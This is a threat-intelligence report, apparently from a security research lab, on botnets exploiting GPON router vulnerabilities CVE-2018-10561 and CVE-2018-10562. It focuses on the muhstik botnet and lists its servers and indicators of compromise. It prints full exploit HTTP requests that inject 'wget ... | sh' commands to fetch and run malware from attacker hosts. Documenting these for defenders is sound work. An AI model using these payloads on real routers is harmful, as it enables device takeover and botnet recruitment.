On May 1st, VPN Mentor disclosed two vulnerabilities against GPON home router. Since then, at least 5 botnet families have been actively exploiting the vulnerability to build their zombie corps, including mettle, muhstik, mirai, hajime and satori. It is the first time we have seen so many botnets competing for territory in such a short time.

Fortunately, the current attack payloads from muhstik, mirai, hajime, and satori, have been tested to be broken and will not implant malicious code. And mettle’s C2 server is now offline, although it could really finish the implant during its appearance. In any case, as these malicious code gangs are actively updating, we should remain vigilant about their behavior.

Muhstik botnet was first disclosed in our blog (report -2018-04). This time the muhstik botnet updated with three new exploits, including the one against GPON home router, and made its total exploits up to 10.

By May 9, our took joint actions with security community to shut down part of its servers, slightly slowed its expansion. However, the expansion pace of muhstik gangs did not stop, and at 2018-05-10 10:30 gmt+8, we noticed that it enabled a new report server 165.227.78.159 to replace the old, shut down one. Now we are working with the security community to follow up.

Multiple Botnets are Actively Exploiting the Recently Exposed GPON Vulnerabilities

The VPN Mentor disclosed two vulnerabilities of Gpon home routers on 2018-05-01 (CVE-2018-10561 authentication bypass and CVE-2018-10562 command execution vulnerabilities). After analyzing the exposed PoC, we can determine that the exploit does work and may have a wide impact as botnets are expected to make use of it.

Starting from the next day (2018-05-02), we saw multiple botnets exploiting this vulnerability to expand their infections. Until 2018-05-10, we have observed 5 botnet families use this vulnerability exploit.

These botnets are:

  • mettle: the attacker utilizes the IP address in Viet Nam (C2 210.245.26.180:4441,scanner 118.70.80.143) and open-sourced Mettle attack module to implant of malware. It is the first time we observe this botnet.
  • muhstik: We first disclose this botnet last month (report-2018-04). In the latest update, Muhstik added exploits for the three vulnerabilities: GPON (cve-2018-10561, cve-2018-10562), JBOSS (cve-2007-1036) and DD-WRT (Web Authentication Bruteforcing).
  • Mirai (more than one variants): After opensourced on 2016-09, mirai botnet has been used by hundreds of malicious gangs. This time we observe that more than one groups are actively using this exploit to deliver their mirai variants
  • hajime:We have released two reports on Hajime botnets( Report-2017-09Briefing-2018-03 ). Hajime also did the update this time and began to infect GPON related devices.

  • satorisatori botnet was first disclosed by us as well, which infected 260,000 devices in 12 hours in 2017-12 (report-2017-11, report-2017-12, report-2018-01 ). We observed that Satori also added GPON vulnerability exploit in the latest update.

We will focus on muhstik botnet in this blog.

Introduction to Muhstik Botnet

The above figure illustrates the structure of Muhstik botnet:

  • Scanning phasemuhstik.scanner will initiate scanning and exploit the vulnerability to force vulnerable GPON devices to report status to the reporting server;
  • Infection phasemuhstik.infector will exploit vulnerability to force GPON susceptible devices to download malware from the download server and install it.
  • Control phasemuhstik.c2.list will send commands to its bots and request them to launch scanning, SSH scale-out, xmrig Mining, cgminer mining, or DDoS attacks.

Muhstik Botnet Update – Scan Phase

In this round, muhstik has added 3 new exploits, as follows:

  1. Gpon(CVE-2018-10561 & CVE-2018-10562)
  2. JBoss(CVE-2007-1036)
  3. DD-WRT(web 认证爆破)

The corresponding state report URLs are as follows:

hxxp://51.254.219.134/gpon.php?port=80|8080  #GPON RCE  
hxxp://51.254.219.134/jboss.php  #JBoss  
hxxp://51.254.219.134/ddwrt.php  #DD-WRT  

As the report server (51.254.219.134) is shut down by the security community, the report server IP address is updated to 165.227.78.159

Now the report URLs are:

hxxp://165.227.78.159/gponb6abe42c3a9aa04216077697eb1bcd44.php?port=80|8080  
hxxp://128.199.251.119/gpon.php?port=80|8080  

Muhstik Botnet Update – Implant Phase

During the implant phase, muhstik will try to force the targeted GPON device to download muhstik.tsunami malicious code and muhstik.aioscan scanning module. The muhstik.loader IP address stayed 51.254.219.137.

The scaning payloads for the Gpon are:

POST /GponForm/diag_Form?images/ HTTP/1.1  
Cache-Control: no-cache  
Connection: keep-alive  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
Host: {target}  
Content-Type: text/plain  
Content-length: 121  
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO -http://51.254.219.134/gpon.php?port=80|8080&ipv=0  
POST /GponForm/diag_Form?images/ HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like  
Gecko) Chrome/4.0.222.4 Safari/532.2  
Content-Length: 113  
Content-Type: text/plain; charset=ISO-8859-1  
Host: {target}  
Connection: Keep-Alive  
Accept-Encoding: gzip,deflate  
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO -http://162.243.211.204/gpon | sh&ipv=0  
POST /GponForm/diag_Form?images/ HTTP/1.1  
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; da-DK; rv:1.9.2.13) Gecko/20101206  
Ubuntu/10.10 (maverick) Firefox/3.6.13  
Content-Length: 112  
Content-Type: text/plain; charset=ISO-8859-1  
Host: {target}  
Connection: Keep-Alive  
Accept-Encoding: gzip,deflate  
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO -http://162.243.211.204/aio | sh&ipv=0  

Muhstik Botnet Update – Malicious Samples

Gpon and JBOSS exploits are burried in the aiomips sample (5C55D50C10F2B500B0FBCD4ADE2B18EA):

While DD-WRT exploit is in aioarm sample(b9c8c709c89b2f9d864aa21164d25752)

Joint Actions with Security Community and Follow Ups

By May 9, we took joint action with security community to shut down part of Muhstik servers, slightly slowed its expansion, including:

51.254.219.134    "AS16276 OVH SAS"  
191.238.234.227    "AS8075 Microsoft Corporation"  

However, the pace of muhstik expansion did not stop. Currently (2018-05-10 10:30 gmt+8), We observed that it enabled a new report server 165.227.78.159 to replace the old, closed one.
We are taking follow-up action together with the security community.

New malicious software URL

hxxp://165.227.78.159/gponb6abe42c3a9aa04216077697eb1bcd44.php   #report URL  
hxxp://162.243.211.204/gponexec         # muhstik.tsunami download URL  

IoC – muhstik

State Report URL List

hxxp://165.227.78.159/gponb6abe42c3a9aa04216077697eb1bcd44.php?port=80|8080  
hxxp://128.199.251.119/gpon.php?port=80|8080  

Malware Download URL List

hxxp://162.243.211.204/aio  
hxxp://162.243.211.204/gpon  
hxxp://162.243.211.204/nsshpftp  
hxxp://162.243.211.204/nsshcro  
hxxp://162.243.211.204/aiomips  
hxxp://210.245.26.180/arm  
hxxp://46.243.189.102/  
hxxp://162.243.211.204/gponexec  
hxxp://51.254.221.129/c/cron  
hxxp://51.254.221.129/c/tfti  
hxxp://51.254.221.129/c/pftp  
hxxp://51.254.221.129/c/ntpd  
hxxp://51.254.221.129/c/sshd  
hxxp://51.254.221.129/c/bash  
hxxp://51.254.221.129/c/pty  
hxxp://51.254.221.129/c/shy  
hxxp://51.254.221.129/c/nsshtfti  
hxxp://51.254.221.129/c/nsshcron  
hxxp://51.254.221.129/c/nsshpftp  
hxxp://51.254.221.129/c/fbsd  

C2 List

139.99.101.96:9090    AS16276 OVH SAS  
144.217.84.99:9090    AS16276 OVH SAS  
145.239.84.0:9090    AS16276 OVH SAS  
147.135.210.184:9090    AS16276 OVH SAS  
142.44.163.168:9090    AS16276 OVH SAS  
192.99.71.250:9090    AS16276 OVH SAS  
142.44.240.14:9090    AS16276 OVH SAS  
121.128.171.44:9090    AS4766 Korea Telecom    #Not active now  
66.70.190.236:9090    AS16276 OVH SAS #Not active now  
145.239.93.125:9090    AS16276 OVH SAS  
irc.de-zahlung.eu:9090        #Not active now  

All IP list

121.128.171.44:9090    AS4766 Korea Telecom    #Not active now  
139.99.101.96:9090    AS16276 OVH SAS  
142.44.163.168:9090    AS16276 OVH SAS  
142.44.240.14:9090    AS16276 OVH SAS  
144.217.84.99:9090    AS16276 OVH SAS  
145.239.84.0:9090    AS16276 OVH SAS  
145.239.93.125:9090    AS16276 OVH SAS  
147.135.210.184:9090    AS16276 OVH SAS  
162.243.211.204    "AS62567 DigitalOcean, LLC"  
165.227.78.159    "AS14061 DigitalOcean, LLC"  
192.99.71.250:9090    AS16276 OVH SAS  
210.245.26.180    "AS18403 The Corporation for Financing & Promoting Technology"  
46.243.189.102    "AS205406 Hostio Solutions B.V."  
51.254.221.129    "AS16276 OVH SAS"  
66.70.190.236:9090    AS16276 OVH SAS #Not active now  
irc.de-zahlung.eu:9090        #Not active now  
51.254.219.137    "AS16276 OVH SAS"  

Those IPs once under muhstik’s control, but now cleared by the security community

51.254.219.134    "AS16276 OVH SAS"  
191.238.234.227    "AS8075 Microsoft Corporation"  

IoC – mettle

C2 and Scanner

210.245.26.180    "AS18403 The Corporation for Financing & Promoting Technology"  
118.70.80.143    "AS18403 The Corporation for Financing & Promoting Technology"  



Sumber: Hacker News